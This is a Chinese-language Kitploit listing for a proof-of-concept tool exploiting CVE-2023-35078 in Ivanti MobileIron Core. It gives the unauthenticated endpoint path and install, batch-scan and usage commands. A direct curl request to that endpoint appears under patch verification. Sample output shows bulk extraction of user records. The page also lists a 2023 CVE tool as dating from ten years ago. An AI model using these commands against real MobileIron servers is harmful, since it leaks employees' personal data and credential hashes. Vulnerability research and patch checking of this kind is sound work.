Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/0nsec/cve-2023-35078
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - Ivanti MobileIron Core 远程未认证API访问利用工具

查看仓库
10年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
CVE-2023-35078 — CVE-2023-35078 - Ivanti MobileIron Core 远程未认证API访问利用工具 | Kitploit

CVE-2023-35078 漏洞利用工具

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Ivanti MobileIron Core 远程未认证 API 访问

Python Version License CVSS Last Updated

一个基于 Python 的概念验证漏洞利用工具,针对 CVE-2023-35078,即 Ivanti MobileIron Core 系统中的远程未认证 API 访问漏洞。

漏洞概述

CVE-2023-35078 是一个影响 Ivanti MobileIron Core 的严重漏洞,允许远程未认证攻击者在无需任何身份验证的情况下访问敏感 API 端点并提取用户数据。

  • CVSS 评分:9.8(严重)
  • CWE:CWE-306(关键功能缺少身份验证)
  • 受影响产品:Ivanti MobileIron Core
  • 受影响版本:
    • 11.2(低于 11.2 CU21)
    • 11.3(低于 11.3 CU18)
    • 11.4(低于 11.4 CU8)
  • 攻击向量:网络
  • 身份验证:无需
  • 用户交互:无需
  • 影响:完全暴露用户数据

技术细节

该漏洞存在于 MobileIron Core 的 API 身份验证机制中,具体位于 /mifs/aad/api/v2/authorized/users 端点。该端点未能正确验证身份验证令牌,从而允许未经授权访问敏感用户信息,包括:

  • 用户凭据:用户名、密码哈希
  • 个人数据:全名、电子邮件地址、电话号码
  • 企业数据:员工 ID、部门信息
  • 设备信息:已注册设备、设备配置
  • 管理数据:用户角色、权限、组成员身份

安装

前置条件

  • Python:3.6 或更高版本
  • 操作系统:Linux、macOS、Windows
  • 网络访问:用于目标测试
  • 权限:系统所有者授权

快速安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# 安装依赖
pip3 install -r requirements.txt

# 赋予可执行权限(Linux/macOS)
chmod +x cve_2023_35078.py

手动安装

root@kitploit:~
# 创建项目目录
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# 下载脚本
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# 安装所需包
pip3 install requests urllib3 termcolor argparse

Docker 安装(可选)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# 使用 Docker 构建并运行
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

使用方法

基本用法

root@kitploit:~
# 测试单个目标
python3 cve_2023_35078.py -u https://mobileiron.example.com

# 从文件测试多个目标
python3 cve_2023_35078.py -f targets.txt

# 详细模式,自定义输出目录
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# 自定义超时和输出设置
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

高级用法示例

root@kitploit:~
# 全面的企业评估
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# 单个目标详细日志记录
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# 批量扫描,自定义超时
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# 快速漏洞检查(无详细输出)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

输出

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] 目标: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] 检查版本: https://vulnerable.mobileiron.com
[*] 检测到版本:11.3
[+] 目标似乎存在漏洞!
[*] 尝试利用:https://vulnerable.mobileiron.com
[*] 尝试端点:/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] 成功!发现 1,247 个用户
[+] 结果已保存至:./results/vulnerable_mobileiron_com_20250821_055013.json
[+] 提取了 1247 条用户记录
[*] 示例字段:['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] 扫描完成!
[*] 已处理目标数:1
[*] 成功利用数:1
[!] 警告:发现 1 个易受攻击的系统!
[!] 测试前请确保已获得适当授权!

详细输出

root@kitploit:~
[*] 检查版本: https://test.mobileiron.com
[*] 尝试端点:/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - 响应长度:45,123 字节
[*] JSON 解析成功
[*] 发现包含 234 条记录的用户数据结构
[+] 成功!发现 234 个用户
[*] 示例用户数据:{'id': '12345', 'username': '[email protected]'}
[+] 结果已保存至:./results/test_mobileiron_com_20250821_055013.json

性能优化

  • 连接池:复用 HTTP 连接
  • 并发请求:对多个目标并行处理
  • 智能超时:根据响应时间自适应超时
  • 内存管理:高效处理大数据集
  • 速率限制:内置延迟,避免压垮目标

供应商补丁信息

补丁验证

root@kitploit:~
# 检查当前版本
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# 验证已修补的端点返回 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

参考资料和资源

官方安全公告

  • NVD - CVE-2023-35078
  • Ivanti 安全公告
  • CISA 已知被利用漏洞目录

技术文档

  • Ivanti MobileIron Core 管理员指南
  • API 文档
  • 安全强化指南

研究论文与分析

  • 详细技术分析
  • 利用技术
  • 威胁情报报告
下载工具
版本存在漏洞补丁可用补丁级别发布日期
11.2.x是可用CU21+2023-07-25
11.3.x是可用CU18+2023-07-25
11.4.x是可用CU8+2023-07-25
11.5.x+否不适用不适用不适用